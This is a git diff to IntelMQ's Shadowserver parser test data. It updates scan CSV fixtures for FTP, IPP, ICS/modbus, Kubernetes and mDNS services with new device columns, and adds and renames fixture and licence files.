-"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","banner","handshake","cipher_suite","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serial_number","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","cert_valid","self_signed","cert_expired","validation_level","auth_tls_response","auth_ssl_response"
-"2019-03-06 06:37:00","61.126.3.70","tcp",21,"arcus-net.co.jp","ftp",4713,"JP","TOKYO","TOKYO",517311,737401,"220 FTP Server ready.|","TLSv1.2","TLS_RSA_WITH_AES_128_CBC_SHA",2048,"*.bizmw.com","GlobalSign Organization Validation CA - SHA256 - G2","Jan 14 08:04:50 2015 GMT","Jan 14 08:04:50 2020 GMT","D9:98:3F:2E:F9:D1:BE:9A:10:1E:DE:51:2C:C1:DF:01:18:0A:20:65","1121DC7421AB7924C3B1D396AEA3707E9E29",2,"sha256WithRSAEncryption","rsaEncryption","NTT Communications Corporation",,"JP","Tokyo","Minato-ku",,,,,,,,"GlobalSign nv-sa",,"BE",,,,,,,,,,"27:4A:8A:3A:A7:DF:82:D0:43:03:0E:6F:48:30:30:C9:24:77:11:1A:08:EF:F7:B9:74:0C:CE:40:87:03:D2:51","E5:93:8B:72:84:0F:35:52:8E:7A:6C:E3:EF:36:90:4C:F2:86:A7:4D:B2:DD:C0:C6:23:83:18:EF:DD:86:34:92:91:57:22:29:75:45:71:8B:3A:CD:F1:27:A9:CA:5F:70:5E:AC:15:A5:E6:63:FD:6F:BB:C5:E2:45:99:73:E9:E6","D1:A7:BC:96:78:1D:16:D0:24:A8:62:7C:3A:95:5A:4A","N","N","N","OV","234 AUTH TLS successful",
-"2019-03-06 06:37:00","62.48.156.65","tcp",21,"dial-62-48-156-65.ptprime.net","ftp",15525,"PT","LISBOA","FRIELAS",0,0,"220-================================================================|        PT Empresas|        Acesso Reservado|        Acesso nao autorizado punido por lei: 109/91; 67/98|    ----------------------------------------------------------------|        HENNES & MAURITZ LDA - 149093|        SITE: PT303 - Cascais Shopping|        MORADA: <MORADA>|        NIR: EWS1822940|    ================================================================|220 FTP server ready, 1 active clients of 4 simultaneous clients allowed.|",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"500 Syntax error, command unrecognized.","500 Syntax error, command unrecognized."
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","banner","handshake","cipher_suite","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serial_number","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","cert_valid","self_signed","cert_expired","validation_level","auth_tls_response","auth_ssl_response","tlsv13_support","tlsv13_cipher","jarm","device_vendor","device_type","device_model","device_version","device_sector"
+"2019-03-06 06:37:00","61.126.3.70","tcp",21,"arcus-net.co.jp","ftp",4713,"JP","TOKYO","TOKYO",517311,737401,"220 FTP Server ready.|","TLSv1.2","TLS_RSA_WITH_AES_128_CBC_SHA",2048,"*.bizmw.com","GlobalSign Organization Validation CA - SHA256 - G2","Jan 14 08:04:50 2015 GMT","Jan 14 08:04:50 2020 GMT","D9:98:3F:2E:F9:D1:BE:9A:10:1E:DE:51:2C:C1:DF:01:18:0A:20:65","1121DC7421AB7924C3B1D396AEA3707E9E29",2,"sha256WithRSAEncryption","rsaEncryption","NTT Communications Corporation",,"JP","Tokyo","Minato-ku",,,,,,,,"GlobalSign nv-sa",,"BE",,,,,,,,,,"27:4A:8A:3A:A7:DF:82:D0:43:03:0E:6F:48:30:30:C9:24:77:11:1A:08:EF:F7:B9:74:0C:CE:40:87:03:D2:51","E5:93:8B:72:84:0F:35:52:8E:7A:6C:E3:EF:36:90:4C:F2:86:A7:4D:B2:DD:C0:C6:23:83:18:EF:DD:86:34:92:91:57:22:29:75:45:71:8B:3A:CD:F1:27:A9:CA:5F:70:5E:AC:15:A5:E6:63:FD:6F:BB:C5:E2:45:99:73:E9:E6","D1:A7:BC:96:78:1D:16:D0:24:A8:62:7C:3A:95:5A:4A","N","N","N","OV","234 AUTH TLS successful",,,,,,,,,
+"2019-03-06 06:37:00","62.48.156.65","tcp",21,"dial-62-48-156-65.ptprime.net","ftp",15525,"PT","LISBOA","FRIELAS",0,0,"220-================================================================|        PT Empresas|        Acesso Reservado|        Acesso nao autorizado punido por lei: 109/91; 67/98|    ----------------------------------------------------------------|        HENNES & MAURITZ LDA - 149093|        SITE: PT303 - Cascais Shopping|        MORADA: <MORADA>|        NIR: EWS1822940|    ================================================================|220 FTP server ready, 1 active clients of 4 simultaneous clients allowed.|",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"500 Syntax error, command unrecognized.","500 Syntax error, command unrecognized.",,,,,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ics.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ics.csv
new file mode 100644
index 000000000..488250ea9
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ics.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","sector","device_vendor","device_type","device_model","device_version","device_id","response_length","raw_response"
+2022-03-02 00:34:22,192.168.0.1,tcp,502,host1.example.net,modbus,64512,ZZ,REGION,CITY,0,0,Sector,Vendor 1,device_type,device_model,device_version,0,5,dGVzdDE=
+2022-03-02 00:34:22,192.168.0.2,tcp,502,host2.example.net,modbus,64513,ZZ,REGION,CITY,0,0,Sector,Vendor 2,device_type,device_model,device_version,0,5,dGVzdDI=
+2022-03-02 00:34:22,192.168.0.3,tcp,502,host3.example.net,modbus,64514,ZZ,REGION,CITY,0,0,Sector,Vendor 3,device_type,device_model,device_version,0,5,dGVzdDM=
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ics.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ics.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ics.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ipp.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ipp.csv
index 88173d6ba..a585db6eb 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ipp.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ipp.csv
@@ -1,2 +1,2 @@
-"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","ipp_version","cups_version","printer_uris","printer_name","printer_info","printer_more_info","printer_make_and_model","printer_firmware_name","printer_firmware_string_version","printer_firmware_version","printer_organization","printer_organization_unit","printer_uuid","printer_wifi_ssid"
-"2020-06-08 11:30:14","123.45.67.89","tcp",631,"some.host.com","ipp",12345,"AA","REGION","CITY",517311,0,"IPP/2.1","CUPS/2.0","ipp://123.45.67.89:631/ipp/print","NPI3F0D22","HP Color LaserJet MFP M277dw","http://123.45.67.89:631/hp/device/info_config_AirPrint.html?tab=Networking&menu=AirPrintStatus","HP Color LaserJet MFP M277dw",20191203,20191203,20191203,"org","unit","urn:uuid:456e4238-4a44-4643-4c42-10e1813f0a18","wifissid"
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","ipp_version","cups_version","printer_uris","printer_name","printer_info","printer_more_info","printer_make_and_model","printer_firmware_name","printer_firmware_string_version","printer_firmware_version","printer_organization","printer_organization_unit","printer_uuid","printer_wifi_ssid","device_vendor","device_type","device_model","device_version","device_sector"
+"2020-06-08 11:30:14","123.45.67.89","tcp",631,"some.host.com","ipp",12345,"AA","REGION","CITY",517311,0,"IPP/2.1","CUPS/2.0","ipp://123.45.67.89:631/ipp/print","NPI3F0D22","HP Color LaserJet MFP M277dw","http://123.45.67.89:631/hp/device/info_config_AirPrint.html?tab=Networking&menu=AirPrintStatus","HP Color LaserJet MFP M277dw",20191203,20191203,20191203,"org","unit","urn:uuid:456e4238-4a44-4643-4c42-10e1813f0a18","wifissid",,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_kubernetes.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_kubernetes.csv
new file mode 100644
index 000000000..ab71b9a15
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_kubernetes.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","version","asn","geo","region","city","naics","sic","sector","http","http_code","http_reason","content_type","server","date","major","minor","git_version","git_commit","git_tree_state","build_date","go_version","compiler","platform","handshake","cipher_suite","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serial_number","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","cert_valid","self_signed","cert_expired","validation_level","browser_trusted","browser_error","raw_cert","raw_cert_chain"
+"2010-02-10 00:00:00",192.168.0.1,tcp,6443,node01.example.com,kubernetes,,64512,ZZ,Region,City,0,0,,HTTP/1.1,200,OK,application/json,,"Tue, 10 May 2022 14:24:13 GMT",1,20,v1.20.13,2444b3347a2c45eb965b182fb836e1f51dc61b70,clean,2021-11-17T13:00:29Z,go1.15.15,gc,linux/amd64,TLSv1.2,TLS_AES_256_GCM_SHA384,2048,example.com,example.com,"2012-11-14 11:18:27","2021-11-12 11:18:27",03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55,B3F13DFBDBA2D8B2,2,sha256WithRSAEncryption,rsaEncryption,,,US,,,,,,,,,,,,,,,,,,,,,,E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0,1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F,F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00,N,N,Y,unknown,N,"x509: failed to load system roots and no roots provided",,
+"2010-02-10 00:00:01",192.168.0.2,tcp,6443,node02.example.com,kubernetes,,64512,ZZ,Region,City,0,0,"Retail Trade",HTTP/1.1,200,OK,application/json,,"Tue, 10 May 2022 14:24:12 GMT",1,23,v1.23.3+e419edf,6f5a5295923a614a4202a7ad274b38b69f9ca8c0,clean,2022-02-25T06:26:46Z,go1.17.5,gc,linux/amd64,TLSv1.2,TLS_AES_256_GCM_SHA384,2048,example.com,example.com,"2012-11-14 11:18:27","2021-11-12 11:18:27",03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55,B3F13DFBDBA2D8B2,2,sha256WithRSAEncryption,rsaEncryption,,,US,,,,,,,,,,,,,,,,,,,,,,E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0,1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F,F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00,N,N,Y,unknown,N,"x509: failed to load system roots and no roots provided",,
+"2010-02-10 00:00:02",192.168.0.3,tcp,6443,node03.example.com,kubernetes,,64512,ZZ,Region,City,0,0,,HTTP/1.1,200,OK,application/json,,"Tue, 10 May 2022 14:24:12 GMT",1,16+,v1.16.9-aliyun.1,4f7ea78,,2020-05-08T07:29:59Z,go1.13.9,gc,linux/amd64,TLSv1.2,TLS_AES_256_GCM_SHA384,2048,example.com,example.com,"2012-11-14 11:18:27","2021-11-12 11:18:27",03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55,B3F13DFBDBA2D8B2,2,sha256WithRSAEncryption,rsaEncryption,,,US,,,,,,,,,,,,,,,,,,,,,,E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0,1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F,F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00,N,N,Y,unknown,N,"x509: failed to load system roots and no roots provided",,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_kubernetes.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_kubernetes.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_kubernetes.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ldap.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ldap.csv.license
deleted file mode 100644
index 942a94035..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ldap.csv.license
+++ /dev/null
@@ -1,2 +0,0 @@
-SPDX-FileCopyrightText: 2019 Guillermo Rodriguez
-SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ldap.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ldap_udp.csv
similarity index 100%
rename from intelmq/tests/bots/parsers/shadowserver/testdata/scan_ldap.csv
rename to intelmq/tests/bots/parsers/shadowserver/testdata/scan_ldap_udp.csv
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/microsoft_sinkhole.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ldap_udp.csv.license
similarity index 100%
rename from intelmq/tests/bots/parsers/shadowserver/testdata/microsoft_sinkhole.csv.license
rename to intelmq/tests/bots/parsers/shadowserver/testdata/scan_ldap_udp.csv.license
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mdns.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mdns.csv
index 520e52526..4a97121e7 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mdns.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_mdns.csv
@@ -1,94 +1,4 @@
-"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","mdns_name","mdns_ipv4","mdns_ipv6","services","workstation_name","workstation_ipv4","workstation_ipv6","workstation_info","http_name","http_ipv4","http_ipv6","http_ptr","http_info","http_target","http_port"
-"2016-07-24 07:38:35","198.51.100.4","udp",5353,"198-51-100-182.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.176 198.51.100.176 198.51.100.176",,"[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:36","198.51.100.221","udp",5353,"198-51-100-221.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.176 198.51.100.176 198.51.100.176 198.51.100.176 198.51.100.176","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:36","198.51.100.174","udp",5353,"198-51-100-174.example.net","mdns",3320,"DE","HAMBURG","HAMBURG",541690,874899,,,,"_workstation.examplehostname.local.; _readynas.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:36","198.51.100.167","udp",5353,"198-51-100-167.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.; _ssh.examplehostname.local.;","examplehostname.local.","198.51.100.60 198.51.100.60 198.51.100.60","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:37","198.51.100.7","udp",5353,"198-51-100-7.example.net","mdns",6724,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.24 198.51.100.24","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:37","198.51.100.86","udp",5353,"198-51-100-86.example.net","mdns",16097,"DE","SACHSEN","LEIPZIG",0,0,,,,"_workstation.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:37","198.51.100.231","udp",5353,"198-51-100-231.example.net","mdns",3320,"DE","THURINGEN","ARNSTADT",541690,874899,,,,"_workstation.examplehostname.local.; _smb.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:37","198.51.100.197","udp",5353,,"mdns",6805,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.87 198.51.100.87","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:38","198.51.100.6","udp",5353,"198-51-100-6.example.net","mdns",15456,"DE","BAYERN","REGENSBURG",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.193","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:38","198.51.100.63","udp",5353,"198-51-100-63.example.net","mdns",42730,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.179","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:38","198.51.100.112","udp",5353,,"mdns",12816,"DE","BAYERN","MUNICH",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.189","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:38","198.51.100.44","udp",5353,"198-51-100-44.example.net","mdns",31103,"DE","THURINGEN","ERFURT",0,0,,,,"_workstation.examplehostname.local.; _sftp-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.215",,"[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:38","198.51.100.231","udp",5353,,"mdns",3320,"DE","BERLIN","BERLIN",518210,737415,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.234","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:38","198.51.100.165","udp",5353,"198-51-100-165.example.net","mdns",3320,"DE","MECKLENBURG-VORPOMMERN","GUSTROW",541690,874899,,,,"_spotify-connect.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:39","198.51.100.170","udp",5353,"198-51-100-170.example.net","mdns",680,"DE","BAYERN","REGENSBURG",0,0,,,,"_workstation.examplehostname.local.; _touch-able.examplehostname.local.;","examplehostname.local.","198.51.100.66","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:39","198.51.100.150","udp",5353,"198-51-100-150.example.net","mdns",20773,"DE","NORDRHEIN-WESTFALEN","WEEZE",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.222 198.51.100.222 198.51.100.222 198.51.100.222 198.51.100.222","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:39","198.51.100.19","udp",5353,"198-51-100-19.example.net","mdns",197540,"DE","BADEN-WURTTEMBERG","KARLSRUHE",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.83","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:39","198.51.100.61","udp",5353,"198-51-100-61.example.net","mdns",6724,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.94","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:39","198.51.100.242","udp",5353,,"mdns",6724,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.251 198.51.100.251","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:39","198.51.100.41","udp",5353,"198-51-100-41.example.net","mdns",15747,"DE","NIEDERSACHSEN","HAGEN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:39","198.51.100.160","udp",5353,"198-51-100-160.example.net","mdns",33891,"DE","BAYERN","NAILA",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.243 198.51.100.243 198.51.100.243 198.51.100.243 198.51.100.243 198.51.100.243 198.51.100.243 1","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:39","198.51.100.190","udp",5353,"198-51-100-190.example.net","mdns",12312,"DE","NORDRHEIN-WESTFALEN","DUSSELDORF",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.29","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:39","198.51.100.224","udp",5353,"198-51-100-224.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.143","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:39","198.51.100.120","udp",5353,"198-51-100-120.example.net","mdns",24940,"DE","BAYERN","NUREMBERG",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.196","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:39","198.51.100.123","udp",5353,"198-51-100-123.example.net","mdns",6724,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:39","198.51.100.122","udp",5353,,"mdns",28753,"DE","HESSEN","FRANKFURT AM MAIN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.192","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:40","198.51.100.146","udp",5353,"198-51-100-146.example.net","mdns",197540,"DE","BADEN-WURTTEMBERG","KARLSRUHE",0,0,,,,"_workstation.examplehostname.local.; _mumble.examplehostname.local.;","examplehostname.local.","198.51.100.127","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:40","198.51.100.112","udp",5353,"198-51-100-112.example.net","mdns",24940,"DE","BAYERN","NUREMBERG",0,0,,,,"_workstation.examplehostname.local.; _mumble.examplehostname.local.;","examplehostname.local.","198.51.100.45","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:40","198.51.100.46","udp",5353,,"mdns",201229,"DE","HESSEN","FRANKFURT AM MAIN",541512,737999,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.202 198.51.100.202","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:40","198.51.100.6","udp",5353,,"mdns",12586,"DE","HESSEN","GELNHAUSEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.34 198.51.100.34 198.51.100.34 198.51.100.34 198.51.100.34 198.51.100.34 198.51.100.34 85.93.18",,"[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:41","198.51.100.210","udp",5353,"198-51-100-210.example.net","mdns",680,"DE","HESSEN","GIESSEN",0,0,,,,"_pdl-datastream.examplehostname.local.; _printer.examplehostname.local.; _ipp.examplehostname.local.; _ipps.examplehostname.local.; _ipp-tls.examplehostname.local.; _http.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:41","198.51.100.97","udp",5353,,"mdns",12816,"DE","BAYERN","MUNICH",0,0,,,,"_printer.examplehostname.local.; _pdl-datastream.examplehostname.local.; _ipp.examplehostname.local.; _http.examplehostname.local.;",,,,,,,,,,,
-"2016-07-24 07:38:41","198.51.100.172","udp",5353,"198-51-100-172.example.net","mdns",680,"DE","BAYERN","AUGSBURG",0,0,,,,"_workstation.examplehostname.local.; _smb.examplehostname.local.; _sftp.examplehostname.local.; _http.examplehostname.local.; _afpovertcp.examplehostname.local.; _device-info.examplehostname.local.; _dacp.examplehostname.local.;","examplehostname.local.","198.51.100.20","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:41","198.51.100.181","udp",5353,"198-51-100-181.example.net","mdns",34878,"DE","BADEN-WURTTEMBERG","LEOPOLDSHAFEN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.244","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:41","198.51.100.85","udp",5353,"198-51-100-85.example.net","mdns",63949,"DE","HESSEN","FRANKFURT AM MAIN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.150","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:41","198.51.100.154","udp",5353,"198-51-100-83.example.net","mdns",24940,"DE","BAYERN","GUNZENHAUSEN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.6","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:41","198.51.100.228","udp",5353,"198-51-100-228.example.net","mdns",6724,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.150","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:42","198.51.100.71","udp",5353,"198-51-100-71.example.net","mdns",200185,"DE","HESSEN","FRANKFURT AM MAIN",0,0,,,,"_workstation.examplehostname.local.; _udisks-ssh.examplehostname.local.;","examplehostname.local.","198.51.100.239","2001:0db8:abcd:0012:0000:0000:0000:0000","[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:42","198.51.100.46","udp",5353,"198-51-100-46.example.net","mdns",29066,"DE","NORDRHEIN-WESTFALEN","WEEZE",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.53 198.51.100.53 198.51.100.53 198.51.100.53",,"[00:00:00:00:00:00]",,,,,,,
-"2016-07-24 07:38:42","198.51.100.78","udp",5353,,"mdns",52094,"DE","BERLIN","BERLIN",0,0,,,,"_workstation.examplehostname.local.;","examplehostname.local.","198.51.100.164 198.51.100.164 198.51.100.164 198.51.100.164 198.51.100.164","2a05:5a40:0:0:185:76:156:150 2a05:5a40:0:0:185:76:156:151 2a05:5a40:0:0:185:76:156:152 2a05:5a40:0:0:185:76:156:153 2a05:5a40:0:","[00:00:00:00:00:00]",,,,,,,
